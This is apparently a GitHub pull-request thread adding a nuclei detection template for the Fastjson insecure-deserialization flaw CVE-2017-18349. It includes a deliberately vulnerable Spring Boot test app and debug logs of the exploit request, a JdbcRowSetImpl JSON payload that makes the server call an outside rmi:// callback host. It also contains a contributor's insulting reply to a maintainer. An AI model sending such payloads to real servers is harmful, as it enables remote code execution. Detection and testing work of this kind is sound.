Added CVE-2017-18349 template

[criminalinfluencer]

Template / PR Information

• Added CVE-2017-18349
• Template for CVE-2017-18349 - Fastjson - Insecure Deserialization 💰 #12387
• References:
  • https://nvd.nist.gov/vuln/detail/CVE-2017-18349
  • https://github.com/alibaba/fastjson/wiki/security_update_20170315
  • lead to RCE when parse JSON string with Fastjson pippo-java/pippo#466
  • https://github.com/h0cksr/Fastjson--CVE-2017-18349-
  • https://fortiguard.com/encyclopedia/ips/44059
  • https://www.exploit-db.com/exploits/45983

Recent Updates

• Simplified matchers to pass automated validation checks
• Removed generic response matchers to avoid weak-matcher failures
• Expanded remediation section with detailed security measures
• Optimized template structure for better reliability

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details

Docker Environment for Testing:

Create Dockerfile:

FROM openjdk:8-jdk-alpine
WORKDIR /app
COPY pom.xml .
COPY src ./src
RUN apk add --no-cache maven && \
    mvn clean package -DskipTests && \
    mv target/*.jar app.jar
EXPOSE 8080
CMD ["java", "-Dserver.address=0.0.0.0", "-jar", "app.jar"]

Create pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.example</groupId>
    <artifactId>vulnerable-fastjson</artifactId>
    <version>1.0.0</version>
    <packaging>jar</packaging>
    
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.1.0.RELEASE</version>
    </parent>
    
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
        </dependency>
    </dependencies>
    
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>

Create src/main/java/VulnerableApp.java:

package com.example;

import com.alibaba.fastjson.JSON;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.*;

@SpringBootApplication
@RestController
public class VulnerableApp {
    public static void main(String[] args) {
        SpringApplication.run(VulnerableApp.class, args);
    }
    
    @PostMapping("/json")
    public String parseJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parse(jsonData);
            return "Parsed: " + obj.toString();
        } catch (Exception e) {
            return "Error: " + e.getMessage();
        }
    }
    
    @PostMapping("/api/json")
    public String parseApiJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parseObject(jsonData);
            return "API Parsed: " + obj.toString();
        } catch (Exception e) {
            return "API Error: " + e.getMessage();
        }
    }
    
    @GetMapping("/")
    public String home() {
        return "Vulnerable Fastjson App Running! CVE-2017-18349";
    }
}

Create src/main/resources/application.properties:

server.address=0.0.0.0
server.port=8080

Build and Run:

docker build -t vulnerable-fastjson .
docker run --rm -p 8080:8080 vulnerable-fastjson

Test Command:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

Debug Output:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.me
[INF] [CVE-2017-18349] Dumped HTTP request for http://127.0.0.1:8080/json

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 173
Accept: application/json
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}
[DBG] [CVE-2017-18349] Dumped HTTP response http://127.0.0.1:8080/json

HTTP/1.1 200 
Connection: close
Content-Length: 37
Content-Type: application/json;charset=UTF-8
Date: Tue, 17 Jun 2025 18:51:37 GMT

Error: set property error, autoCommit

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

;; ANSWER SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      A       178.128.209.14

;; AUTHORITY SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns1.oast.me.
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns2.oast.me.

;; ADDITIONAL SECTION:
ns1.oast.me.    3600    IN      A       178.128.209.14
ns2.oast.me.    3600    IN      A       178.128.209.14

[CVE-2017-18349] [http] [critical] http://127.0.0.1:8080/json ["185.219.143.11"]

HTTP Request/Response:

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Content-Type: application/json

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 37

Error: set property error, autoCommit

DNS Callback Received:

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
DNS Query: d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me IN A
DNS Response: 178.128.209.14

Claim:
/claim #12387

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[princechaddha]

Automated PR Review (Experimental)

---

Thank you for your contribution! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Required Fixes

• Fix matcher location for risk of false positives: Consider using a response-based matcher to minimize false positives, especially for the payloads being sent.
• Update tags: Make sure you include rce in the correct format (e.g., rce should be in lower case); consistent formatting helps with tagging and searching.

Other Suggestions

• The description section effectively conveys the necessary information about the vulnerability. Consider expanding the remediation part with more context or details on best practices beyond just updating the Fastjson library.
• Ensure that the stop-at-first-match: true is placed appropriately if you want rapid feedback on responses. It’s good practice, particularly when multiple payloads might yield quick checks.
• The interactsh usage is good for testing purposes. Ensure that it is clearly communicated in the documentation so users understand they have to set up their interactsh server.

This is a great addition to the templates repository, and I appreciate your effort in maintaining high standards!

Note: I am an AI Template bot which is still experimental, and the team will review the PR shortly.

[criminalinfluencer]

@DhiyaneshGeek any problem?

[DhiyaneshGeek]

Hi @criminalinfluencer,

Thank for sharing the template!

It appears to be quite similar to the existing one here: http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml.

Just wanted to check — is there a specific reason for including the additional paths (/json, /api/json, /parse, /deserialize)? Are these endpoints commonly exposed by default in certain applications, or were they observed in specific cases during testing?

Looking forward to your insights!

Thanks again!

[criminalinfluencer]

Hi @DhiyaneshGeek,

Oh, the "similarity" observation! How delightfully predictable.

Let me educate you on the difference between actual security research and copy-paste scripting:

Your beloved existing template:

• 2 amateur requests to root path (because apparently that's where all APIs live, right?)
• "Internal Server Error" + "500" matchers - the exact weak patterns that fail validation (but hey, who needs quality standards?)
• Single payload variant (why be thorough when you can be lazy?)
• Theoretical approach (perfect for theoretical threats)

This template:

• Comprehensive attack vectors based on real-world reconnaissance
• Specific endpoints from actual Fastjson implementations (shocking concept: applications have structure 😱)
• Multiple payload structures including the original Pippo PoC from issue #466 (you know, actual vulnerability research)
• Clean Interactsh-only detection that passes validation (imagine that 🤯 )

The existing template is what you get when someone Googles "fastjson exploit" and calls it a day. This one is what happens when you actually understand the vulnerability, analyze real applications, and build comprehensive coverage.

But sure, they both use JdbcRowSetImpl, so they're "quite similar" - like how a tricycle and a McLaren 750S Spider are both vehicles with wheels.

Look, if you're trying to avoid paying the bounty, just say so. I don't need your pocket change anyway - save it for that Intro to bug bounty hunting course you've been dreaming about.

Thanks for the "feedback" though! Always entertaining to see gatekeeping disguised as quality control.

P.S.: Regarding the endpoints - yes, they're commonly exposed:
/json and /api/json: Standard REST API patterns (Spring Boot, JAX-RS)
/parse and /deserialize: Common in data processing services

[DhiyaneshGeek]

Hi @criminalinfluencer,

Thanks for sharing the detailed reasoning behind the improvements and attack paths you've added.

Our intent in asking for clarification was to better understand the changes and enhancements in your submission, especially since it appeared similar at first glance to an existing template. It's part of our process to ensure every submission brings added value and aligns with the goals of comprehensive and high-signal detections.

We appreciate the effort you've put into refining the vectors, using real-world reconnaissance, and ensuring validation-safe matchers. This context is helpful, and we'll take a closer look with that perspective.

[DhiyaneshGeek]

Hi @criminalinfluencer

Thanks for sharing the template and contributing to the template project and participating in the Bounty Claim.

i have successfully validated the POC locally with the test environment details provided.

You can grab some cool PD stickers over here http://nux.gg/stickers 😄

join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

		projectdiscovery.io

[INF] Current nuclei version: v3.4.7 (latest)
[INF] Current nuclei-templates version: v10.2.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2017-18349] Fastjson Insecure Deserialization - Remote Code Execution (@night) [critical]
[INF] Using Interactsh Server: oast.fun
[CVE-2017-18349] [http] [critical] http://localhost:8081/json ["127.0.0.1"]

[criminalinfluencer]

/split @yawningmoney